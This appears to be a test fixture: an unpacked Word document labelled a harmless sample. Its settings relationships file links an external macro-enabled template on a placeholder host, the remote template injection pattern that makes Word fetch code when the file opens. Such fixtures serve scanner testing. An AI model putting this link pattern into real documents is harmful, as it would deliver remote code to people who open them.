
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"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Harmless sample document.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/settings.xml><w:settings/>
</file>

<file path=word/_rels/settings.xml.rels><?xml version="1.0"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://template.example.invalid/x.dotm" TargetMode="External"/></Relationships>
</file>